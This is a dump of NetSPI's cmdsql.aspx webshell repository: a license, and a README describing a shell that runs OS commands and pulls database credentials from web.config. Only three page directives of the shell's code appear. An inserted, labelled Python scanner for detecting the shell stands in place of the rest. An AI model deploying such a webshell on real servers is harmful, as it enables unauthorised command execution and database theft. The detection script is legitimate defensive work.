├── LICENSE
├── README.md
└── cmdsql.aspx

/LICENSE:
--------------------------------------------------------------------------------
NetSPI Free Code Evaluation and Limited Use License Agreement (“License Agreement”)
Copyright 2013 Network Security Professionals, Inc. (all rights reserved)

Network Security Professionals, Inc. (“NetSPI”) hereby grants you a limited, nonexclusive, royalty free United States license to use the code and associated documentation files to which this License Agreement is appended or with which this License Agreement is published or linked (the "Software") to review, copy, publish and redistribute the Software solely for the purposes of using the Software as a reference, in read only form, for (i) evaluating potential vulnerabilities in other software or hardware, (ii) public commentary on such vulnerabilities, and (iii) educational use related to (i) and (ii), PROVIDED THAT no fee may be charged by you or your company to any person or entity for the uses described in (i), (ii) or (iii). This License Agreement specifically excludes any rights for you and/or your company to modify, adapt, license, sublicense, prepare derivative works of and/or sell copies of the Software, all of which are reserved solely to NetSPI. The license granted to the Software by this License Agreement is subject to the following conditions:

• Redistributions of source code must retain the terms of this License Agreement and the copyright information listed herein.
• Redistributions in binary form must reproduce the terms of this License Agreement and the copyright information listed herein in the documentation and/or other materials provided with the distribution.
• Neither the names of NetSPI, its employees, contractors or vendors nor the names of its contributors may be used to endorse or promote activities described in the first sentence of this License Agreement without the prior written permission of NetSPI. You agree not to assert any rights in the Software which are inconsistent with the terms of this License Agreement, including (but not limited to) any claim that you or your company are the author or owner of the Software.
• If you modify, adapt or prepare derivative works of the Software (all of which are a violation of the terms of this License Agreement), you agree that NetSPI shall, without any further action by you or your company, own all rights in such modifications, adaptions or derivative works in the Software, all of which shall be considered created by you or your company as a “work made for hire” for NetSPI.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL NETSPI, ITS OFFICERS, DIRECTORS, SHAREHOLDERS, EMPLOYEES, CONTRACTORS OR VENDORS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER ARISING IN CONTRACT, TORT OR OTHERWISE, FOR OR ARISING FROM, OR IN CONNECTION WITH, THE SOFTWARE OR THIS LICENSE. Except for the limited rights granted to you and your company in this License Agreement, NetSPI reserves to itself all copyright, trademark, patent, trade secret or other intellectual property rights of any kind in the Software, whether arising under US law or otherwise.

This License Agreement becomes binding on you and your company upon your download, review or other use of the Software. If you do not accept the terms of this License Agreement, do not download, review or make any other use of the Software. For purposes of this License Agreement, “your company” means any organization or undertaking for which you are an owner, employee or contractor at the time you access and/or use the Software.

This License Agreement shall expire immediately if you (i) make any claim or institute any proceeding (including, but not limited to, litigation) against NetSPI for or arising from the Software or this License Agreement (including, without limitation, a cross-claim or counterclaim in a lawsuit), or (ii) you breach any term of this License Agreement.
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
### Scripting Information
* Name: cmdsql.aspx
* Author: Antti Rantasaari, NetSPI - 2013
* Stylesheets: Scott Sutherland (@nullbind)
* Blog: https://blog.netspi.com/adding-powershell-to-web-shells-to-get-database-access/

### Description

cmdsql.aspx is a webshell that can be used for the following tasks:
* Execute operating system commands
* Parse web.config files for connection strings (based on root directory)
* Execute MSSQL queries using connection strings recovered from web.config files

### IP Address Filter
The webshell reads the IP address of the remote host for each incoming request and compares it to a hardcoded list of allowed IPs in order to determine whether or not the request should be processed. By default, all IP addresses are allowed access to the webshell. To restrict access, modify the appropriate line in cmdsql.aspx before deployment by referring to the examples below:
* Allow all IP addresses:
  `Dim strAllowedIPs As String = "*"`
* Only allow a specific IP address:
  `Dim strAllowedIPs As String = "10.1.1.100"`
* Only allow a specific set of IP addresses (use a comma-separated list when entering multiple IPs):
  `Dim strAllowedIPs As String = "127.0.0.1,192.168.1.100,10.1.1.100"`

### Notes
* The command execution code is based on the old cmd.aspx from fuzzdb - http://code.google.com/p/fuzzdb/

### Screen Shots
* Operating system command execution.
* Parse web.config files.
* Execute MSSQL queries using recovered connection strings.
--------------------------------------------------------------------------------

/cmdsql.aspx:
--------------------------------------------------------------------------------
```aspx
<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="system.IO" %>
<%@ import Namespace="System.Diagnostics" %>
```
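As an added defender-side example (not part of the NetSPI repository), the following Python script scans an IIS web root for pages carrying the markers the README and the surviving page directives expose: the `strAllowedIPs` allowlist variable, the VB `Debug="true"` page directive, the `System.Diagnostics` and `System.IO` imports, and references to `web.config`. The indicator weights and the alert threshold are assumptions of mine, and the two sample pages are constructed inline so the script runs offline.

```python
"""Scan a web root for ASP.NET pages that look like cmdsql.aspx."""
import os
import re
import tempfile

# Indicators drawn from the README and the page directives shown above.
INDICATORS = {
    "allowlist_var": re.compile(r"strAllowedIPs", re.I),
    "vb_debug_page": re.compile(r'<%@\s*Page\s+Language="VB"\s+Debug="true"', re.I),
    "diag_import": re.compile(r'Namespace="System\.Diagnostics"', re.I),
    "io_import": re.compile(r'Namespace="System\.IO"', re.I),
    "webconfig_ref": re.compile(r"web\.config", re.I),
}
# Assumed weights: markers that rarely appear in legitimate pages score higher.
WEIGHTS = {"allowlist_var": 4, "vb_debug_page": 2, "diag_import": 2,
           "io_import": 1, "webconfig_ref": 2}
THRESHOLD = 5  # assumed: flag a file once its summed weight reaches this value

def score_file(text):
    """Return (score, matched indicator names) for one page's source text."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    return sum(WEIGHTS[h] for h in hits), hits

def scan_webroot(root):
    """Walk the web root and return {relative path: (score, hits)} for suspects."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith((".aspx", ".ashx", ".asmx")):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                score, hits = score_file(fh.read())
            if score >= THRESHOLD:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = (score, hits)
    return findings

def demo():
    """Build a constructed web root with one suspect and one benign page, then scan it."""
    root = tempfile.mkdtemp()
    suspect = ('<%@ Page Language="VB" Debug="true" %>\n'      # constructed sample
               '<%@ import Namespace="system.IO" %>\n'
               '<%@ import Namespace="System.Diagnostics" %>\n'
               'Dim strAllowedIPs As String = "*"\n')
    benign = '<%@ Page Language="C#" %>\n<asp:Label runat="server" Text="Hi" />\n'
    os.makedirs(os.path.join(root, "upload"))
    with open(os.path.join(root, "upload", "cmdsql.aspx"), "w") as fh:
        fh.write(suspect)
    with open(os.path.join(root, "default.aspx"), "w") as fh:
        fh.write(benign)
    return scan_webroot(root)

if __name__ == "__main__":
    print(demo())
```

A match is a triage lead, not proof: confirm by reviewing the file and the IIS request logs for POSTs to it from unexpected source addresses.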